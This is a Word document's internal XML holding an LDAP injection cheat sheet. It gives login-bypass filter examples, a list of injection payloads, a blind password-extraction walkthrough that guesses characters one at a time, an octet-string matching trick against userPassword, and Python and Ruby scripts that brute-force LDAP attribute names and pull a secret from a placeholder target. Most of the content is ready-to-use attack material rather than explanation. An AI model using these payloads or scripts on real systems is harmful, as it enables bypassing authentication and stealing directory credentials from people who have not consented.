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371" w:rsidRPr="00504371" w:rsidRDefault="00504371" w:rsidP="0050437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50437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Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00504371" w:rsidRPr="00504371" w:rsidRDefault="00504371" w:rsidP="005043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50437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Example 1.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user  =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*)(</w:t>
      </w:r>
      <w:proofErr w:type="spell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uid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=*))(|(</w:t>
      </w:r>
      <w:proofErr w:type="spell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uid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=*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pass  =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password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query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= (&amp;(uid=*)(uid=*))(|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00504371" w:rsidRPr="00504371" w:rsidRDefault="00504371" w:rsidP="005043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50437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Example 2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user  =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admin)(!(&amp;(1=0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pass  =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q))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query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= (&amp;(</w:t>
      </w:r>
      <w:proofErr w:type="spell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uid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=admin)(!(&amp;(1=0)(</w:t>
      </w:r>
      <w:proofErr w:type="spell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userPassword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=q))))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00504371" w:rsidRPr="00504371" w:rsidRDefault="00504371" w:rsidP="0050437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50437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Payloads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*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*)(&amp;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*)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)%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00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)(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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cn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=))\x00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*()|%26'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*()|&amp;'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*(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|(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mail=*))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*(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|(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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objectclass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=*))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*)(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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uid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=*))(|(</w:t>
      </w:r>
      <w:proofErr w:type="spell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uid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=*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*/*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*|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/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//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//*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@*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|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admin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*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admin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*)((|</w:t>
      </w:r>
      <w:proofErr w:type="spell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userpassword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=*)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admin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*)((|</w:t>
      </w:r>
      <w:proofErr w:type="spell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userPassword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=*)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x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en-IN"/>
        </w:rPr>
        <w:t>' or name()='username' or 'x'='y</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00504371" w:rsidRPr="00504371" w:rsidRDefault="00504371" w:rsidP="0050437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50437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Blind Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00504371" w:rsidRPr="00504371" w:rsidRDefault="00504371" w:rsidP="005043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50437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We can extract using a bypass login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(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&amp;(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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sn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=administrator)(password=*))    : OK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(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&amp;(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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sn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=administrator)(password=A*))   : KO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(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&amp;(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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sn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=administrator)(password=B*))   : KO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...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(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&amp;(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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sn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=administrator)(password=M*))   : OK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(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&amp;(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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sn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=administrator)(password=MA*))  : KO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(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&amp;(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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sn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=administrator)(password=MB*))  : KO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...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(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&amp;(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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sn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=administrator)(password=MY*))  : OK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(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&amp;(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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sn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=administrator)(password=MYA*)) : KO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(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&amp;(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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sn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=administrator)(password=MYB*)) : KO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(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&amp;(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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sn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=administrator)(password=MYC*)) : KO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...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(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&amp;(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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sn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=administrator)(password=MYK*)) : OK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lastRenderedPageBreak/>
        <w:t>(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&amp;(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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sn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=administrator)(password=MYKE)) : OK</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00504371" w:rsidRPr="00504371" w:rsidRDefault="00504371" w:rsidP="0050437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50437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Defaults attributes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00504371" w:rsidRPr="00504371" w:rsidRDefault="00504371" w:rsidP="00504371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50437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Can be used in an injection like </w:t>
      </w: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*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)(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ATTRIBUTE_HERE=*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spellStart"/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userPassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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surname</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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name</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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spellStart"/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cn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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spellStart"/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sn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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spellStart"/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objectClass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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mail</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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spellStart"/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givenName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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spellStart"/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commonName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00504371" w:rsidRPr="00504371" w:rsidRDefault="00504371" w:rsidP="0050437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50437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 xml:space="preserve">Exploiting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0050437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userPassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0050437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 xml:space="preserve"> attribute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00504371" w:rsidRPr="00504371" w:rsidRDefault="00504371" w:rsidP="00504371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userPassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0050437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attribute is not a string like the </w:t>
      </w:r>
      <w:proofErr w:type="spell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cn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0050437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 attribute for example but it’s an OCTET STRING In LDAP, every object, type, operator etc. is referenced by an OID : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0050437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octetStringOrderingMatch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0050437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(OID 2.5.13.18).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00504371" w:rsidRPr="00504371" w:rsidRDefault="00504371" w:rsidP="00504371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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00504371">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>octetStringOrderingMatch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00504371">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> (OID 2.5.13.18): An ordering matching rule that will perform a bit-by-bit comparison (in big endian ordering) of two octet string values until a difference is found. The first case in which a zero bit is found in one value but a one bit is found in another will cause the value with the zero bit to be considered less than the value with the one bit.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userPassword:2.5.13.18:=\xx (\xx is a byte)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userPassword:2.5.13.18:=\xx\xx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userPassword:2.5.13.18:=\xx\xx\xx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00504371" w:rsidRPr="00504371" w:rsidRDefault="00504371" w:rsidP="0050437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50437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Scripts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00504371" w:rsidRPr="00504371" w:rsidRDefault="00504371" w:rsidP="005043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50437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Discover valid LDAP fields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#!/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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usr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/bin/python3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import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requests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import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string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fields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= []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spellStart"/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url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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= 'https://URL.com/'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f = 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open(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'</w:t>
      </w:r>
      <w:proofErr w:type="spell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dic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', 'r') #Open the wordlists of common attributes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spellStart"/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wordl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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= </w:t>
      </w:r>
      <w:proofErr w:type="spell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f.read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().split('\n')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spellStart"/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f.close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()</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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for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</w:t>
      </w:r>
      <w:proofErr w:type="spell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i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in </w:t>
      </w:r>
      <w:proofErr w:type="spell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wordl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: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   r = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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requests.post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(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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url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, data = {'login':'*)('+</w:t>
      </w:r>
      <w:proofErr w:type="spell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str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(</w:t>
      </w:r>
      <w:proofErr w:type="spell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i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)+'=*))\x00', 'password':'</w:t>
      </w:r>
      <w:proofErr w:type="spell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bla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'}) #Like (&amp;(login=*)(ITER_VAL=*))\x00)(password=</w:t>
      </w:r>
      <w:proofErr w:type="spell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bla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))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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    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if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'TRUE CONDITION' in </w:t>
      </w:r>
      <w:proofErr w:type="spell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r.text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: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fields.append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(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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str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(</w:t>
      </w:r>
      <w:proofErr w:type="spell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i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))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print(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fields)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00504371" w:rsidRPr="00504371" w:rsidRDefault="00504371" w:rsidP="005043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50437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Ref. [5</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0050437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][</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0050437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5]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00504371" w:rsidRPr="00504371" w:rsidRDefault="00504371" w:rsidP="005043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50437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Special blind LDAP injection (without "*")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#!/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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usr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/bin/python3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import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requests, string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alphabet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= </w:t>
      </w:r>
      <w:proofErr w:type="spell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string.ascii_letters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+ </w:t>
      </w:r>
      <w:proofErr w:type="spell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string.digits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+ "_@{}-/()!\"$%=^[]:;"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flag = ""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for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</w:t>
      </w:r>
      <w:proofErr w:type="spell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i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in range(50):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   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print(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"[</w:t>
      </w:r>
      <w:proofErr w:type="spell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i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] Looking for number " + </w:t>
      </w:r>
      <w:proofErr w:type="spell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str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(</w:t>
      </w:r>
      <w:proofErr w:type="spell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i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))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   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for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char in alphabet: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       r = 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requests.get(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"http://ctf.web?action=dir&amp;search=admin*)(password=" + flag + char)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       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if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("TRUE CONDITION" in </w:t>
      </w:r>
      <w:proofErr w:type="spell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r.text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):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           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flag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+= char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           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print(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"[+] Flag: " + flag)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           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break</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00504371" w:rsidRPr="00504371" w:rsidRDefault="00504371" w:rsidP="0050437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50437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Ref. [5</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0050437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][</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0050437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5]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#!/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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usr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/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spell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env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ruby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require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'net/http'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alphabet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= [*'</w:t>
      </w:r>
      <w:proofErr w:type="spell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a'..'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z</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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', *'A'..'Z', *'0'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..'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9'] + '_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@{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}-/()!"$%=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^[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]:;'.split('')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flag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= ''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(0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..50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).each do |</w:t>
      </w:r>
      <w:proofErr w:type="spell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i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|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 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puts(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"[</w:t>
      </w:r>
      <w:proofErr w:type="spell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i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] Looking for number #{</w:t>
      </w:r>
      <w:proofErr w:type="spell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i</w:t>
      </w:r>
      <w:proofErr w:type="spell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}")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alphabet.each</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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do |char|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   r = Net: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:HTTP.get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(URI("http://ctf.web?action=dir&amp;search=admin*)(password=#{flag}#{char}"))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   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if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/TRUE CONDITION/.match?(r)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     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flag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+= char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     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puts(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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"[+] Flag: #{flag}")</w:t>
      </w:r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     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break</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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   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end</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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 </w:t>
      </w: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end</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00504371" w:rsidRPr="00504371" w:rsidRDefault="00504371" w:rsidP="0050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504371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end</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00D1769D" w:rsidRDefault="00D1769D">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00D17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733"/>
    <w:rsid w:val="00504371"/>
    <w:rsid w:val="008B7733"/>
    <w:rsid w:val="00D1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2FFAF-8862-4903-B661-F3CD1717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43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04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43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0437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0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37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504371"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-c1">
    <w:name w:val="pl-c1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00504371"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00504371"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-cce">
    <w:name w:val="pl-cce"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00504371"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-c">
    <w:name w:val="pl-c"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00504371"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-s1">
    <w:name w:val="pl-s1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00504371"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-s">
    <w:name w:val="pl-s"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00504371"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-en">
    <w:name w:val="pl-en"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00504371"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-kos">
    <w:name w:val="pl-kos"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00504371"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-v">
    <w:name w:val="pl-v"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00504371"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-sr">
    <w:name w:val="pl-sr"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00504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337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2024-07-30T01:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-30T01:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>